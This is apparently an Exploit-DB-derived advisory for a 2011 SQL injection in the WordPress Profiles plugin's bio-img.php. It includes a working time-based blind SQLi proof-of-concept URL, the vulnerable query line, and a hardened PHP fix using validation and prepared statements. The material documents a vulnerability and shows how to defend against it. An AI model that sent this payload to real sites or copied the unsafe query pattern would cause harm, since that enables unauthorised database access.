Vendor: Profiles
By: Miroslav Stampar
CVSS: 9 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Profiles
Affected Version From: 2.0 RC1
Affected Version To: 2.0 RC1
Patch Exists: NO
Related CWE: N/A
CPE: a:wordpress:profiles
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
Year: 2011

WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability

A SQL injection vulnerability exists in the WordPress Profiles plugin version 2.0 RC1. The `id` GET parameter handled by library/bio-img.php is interpolated into an SQL query without sanitization. An attacker can exploit this to inject arbitrary SQL into the query, allowing them to access, modify, or delete data in the application's back-end database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in an unsafe manner.
Source

Exploit-DB raw data:

# Exploit Title: WordPress Profiles plugin <= 2.0 RC1 SQL Injection Vulnerability
# Date: 2011-08-28
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/profiles.2.0.RC1.zip
# Version: 2.0 RC1 (tested)
# Note: magic_quotes has to be turned off

---
PoC
---
http://www.site.com/wp-content/plugins/profiles/library/bio-img.php?id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------
Vulnerable code
---------------
$query = "SELECT * FROM ".$wpdb->prefix."bios WHERE id='$_GET[id]'";
...
$result = mysql_query($query);
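The hardened counterpart of the query above, as an added example that is not the plugin's own code. It assumes the script runs inside WordPress (so `$wpdb` is available) and that the `bios` table is keyed on an integer `id` column; the `wp-load.php` path is an assumption based on the plugin's directory layout.

```php
<?php
// Added example (not the Profiles plugin's code): a hardened replacement for
// the query in library/bio-img.php. Assumes an integer `id` column in the
// {prefix}bios table.

// The original script is requested directly under wp-content, so bootstrap
// WordPress to get $wpdb. Path assumed from plugins/profiles/library/.
require_once dirname(__FILE__) . '/../../../../wp-load.php';

global $wpdb;

// 1. Validate: accept only a positive integer. Anything else (including the
//    quote-breaking payload from the PoC) is rejected before any SQL is built,
//    and the outcome no longer depends on the magic_quotes setting.
$id = filter_input(INPUT_GET, 'id', FILTER_VALIDATE_INT, array(
    'options' => array('min_range' => 1),
));
if ($id === false || $id === null) {
    status_header(400);
    exit('invalid id');
}

// 2. Parameterize: $wpdb->prepare() binds the value, and %d forces an
//    integer, so the data can never be interpreted as SQL syntax.
$row = $wpdb->get_row(
    $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}bios WHERE id = %d",
        $id
    )
);

if ($row === null) {
    status_header(404);
    exit('not found');
}

// ... serve the image data from $row as the original script does.
```

Both steps matter: validation rejects malformed input early, while `prepare()` keeps the query safe even for columns where free-form text is legitimate.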